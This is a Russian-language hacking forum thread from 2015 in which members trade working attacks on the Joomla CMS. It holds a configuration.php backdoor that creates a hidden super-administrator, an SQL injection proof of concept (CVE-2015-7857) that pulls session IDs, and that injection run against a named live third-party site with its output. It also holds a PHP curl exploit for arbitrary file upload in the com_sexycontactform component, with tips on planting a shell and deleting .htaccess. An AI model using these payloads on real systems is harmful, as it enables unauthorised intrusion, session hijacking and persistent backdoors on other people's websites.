HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #291  
Старый 13.02.2015, 14:00
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Бэкдорим Joomla через файл конфигурации штатными средствами:

в файл ./configuration.php добавляем строчку

Цитата:
Сообщение от None  
public $root_user='';
Вписанный таким образом пользователь автоматически становится СуперАдмином, не смотря на его настройки в MySQL.

Вычитал тут
 
Ответить с цитированием

  #292  
Старый 28.07.2015, 22:21
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Цитата:
Сообщение от ravencrow  
ravencrow said:

Как узнать версию Joomla 2.5/3.0
Если есть доступ на чтение из БД, выполнить следующий запрос:
select version_id from префикс_schemas where extension_id=700;
или
select manifest_cache from префикс_extensions where extension_id=700;
А не проще подставить к домену /language/en-GB/en-GB.xmlи узнать версию?
 
Ответить с цитированием

  #293  
Старый 23.10.2015, 13:48
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Joomla ver. 3.2/3.4.4

Уязвимый компонент /administrator/components/com_contenthistory/models/history.php

POC:

Цитата:
Сообщение от None  
index.php?option=com_contenthistory&view=history&l ist[ordering]=&item_id=75&type_id=1&list[select]=(select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Подробнее тут.
 
Ответить с цитированием

  #294  
Старый 23.10.2015, 15:03
AppS
Познающий
Регистрация: 08.08.2009
Сообщений: 37
Провел на форуме:
162650

Репутация: 2
Отправить сообщение для AppS с помощью ICQ
По умолчанию

Начинаем марафон
 
Ответить с цитированием

  #295  
Старый 27.10.2015, 13:08
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

Цитата:
Сообщение от ZodiaX  
ZodiaX said:

Joomla
ver. 3.2/3.4.4
Уязвимый компонент /administrator/components/com_contenthistory/models/history.php
POC
:
Подробнее
тут
.
А как только угадать префикс таблицы.
 
Ответить с цитированием

  #296  
Старый 27.10.2015, 14:31
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sharingan  
Sharingan said:

А как только угадать префикс таблицы.
Ну в модуле это уже реализовали https://github.com/rapid7/metasploit...ull/6129/files

Можно конечно его отдельно под себе переписать.
 
Ответить с цитированием

  #297  
Старый 27.10.2015, 14:40
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Sharingan  
Sharingan said:

А как только угадать префикс таблицы.
Площадка для тестов:

_ttp://test.bip.visacom.pl/index.php?option=com_contenthistory&view=history&l ist[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue(1,(select concat_ws(0x3a,user(),version(),database()))))

Обратите внимание, что при ошибки выдается и префикс таблици:

Цитата:
Сообщение от None  
500 - XPATH syntax error: '
@10.254.34.22:5.5.43-MariaDB-log
' SQL=SELECT (ExtractValue(1,(select concat_ws(0x3a,user(),version(),database())))),uc. name AS editor
FROM `cons9_ucm_history`
AS h LEFT JOIN cons9_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 75 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`
 
Ответить с цитированием

  #298  
Старый 09.11.2015, 15:14
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

тулза под винду для быстрой эсплутации CVE-2015-7857 Joomla



http://pan.baidu.com/s/1kTER9bT пасс:htmo
 
Ответить с цитированием

  #299  
Старый 09.11.2015, 20:49
hpol
Guest
Сообщений: n/a
Провел на форуме:
21252

Репутация: 15
По умолчанию

Только чем такой хэш можно расшифровать ? Через session_id пробовал войти на паре сайтов - не вышло .
 
Ответить с цитированием

  #300  
Старый 11.11.2015, 18:05
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Joomla com_sexycontactform Arbitrary File Upload Vulnerability

по мотивам _http://0day.today/exploit/description/24518

exploit:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://localhost"[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Z:\\home\\test\\www\\exp\\css.php"[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]() ) {
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_URL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#DD0000"]/components/com_sexycontactform/fileupload/index.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POSTFIELDS[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]"files"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"@"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_USERAGENT[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10'[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#FF8000"]//var_dump($in);
[/COLOR][COLOR="#007700"]}

[/
COLOR][/COLOR
На разных площадках по разному расширения пропускает, для загрузки шелла, пробуйте играться с расширением

Для удаления какого либо файла из папки files

Используем метод

DELETE:

http://www.localhost/components/com_...file=.htaccess

Сорци уязвимой части компанента:
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ